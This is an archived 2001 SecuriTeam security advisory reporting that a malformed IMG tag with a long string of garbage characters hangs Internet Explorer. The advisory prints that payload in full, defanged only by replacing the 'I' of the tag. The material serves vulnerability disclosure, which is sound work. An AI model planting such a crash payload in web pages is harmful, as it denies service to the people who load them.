[NT] IE Denial of Service (Bad IMG Tag)
From: support@securiteam.comDate: 12/14/01
- Previous message: support@securiteam.com: "[NEWS] Mail Essentials Reveals Identity of First BCC Recipient"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 14 Dec 2001 21:51:58 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
IE Denial of Service (Bad IMG Tag)
------------------------------------------------------------------------
SUMMARY
Internet Explorer suffers from a denial-of-service vulnerability that
allows a web site administrator to cause the client to stop responding to
legitimate web requests.
DETAILS
An image tag with garbage characters in a particular order can cause the
Internet Explorer to hang, causing a denial of service attack.
The problematic tag is as follows (Note that the 'I' of IMG have been
replaced, to prevent the vulnerability from occurring):
<!mg
src=ÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙ
ÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧
ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåé
âäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o
¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖר
ÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉË
§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäå
éâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}
o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×
ØÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ
˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâã
äåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåç
ê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕ
ÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛ
ÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓ
ßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâä
àåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹
ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙ
ÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧
ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåé
âäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o
¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖר
ÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉË
§ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäå
éâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}
o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖ×
ØÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ
˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâã
äåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåç
ê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕ
ÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛ
ÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓßâãäåéâäàåçê=}o¹¹¹ºÖÕÖרÙÚÛÖÉ˧ÞÓ
ßâãäåéâäàåçê>
ADDITIONAL INFORMATION
The information has been provided by <mailto:zeno@cgisecurity.net> zeno,
and <mailto:screff@routing.org> Jeff Sampson .
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Mail Essentials Reveals Identity of First BCC Recipient"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|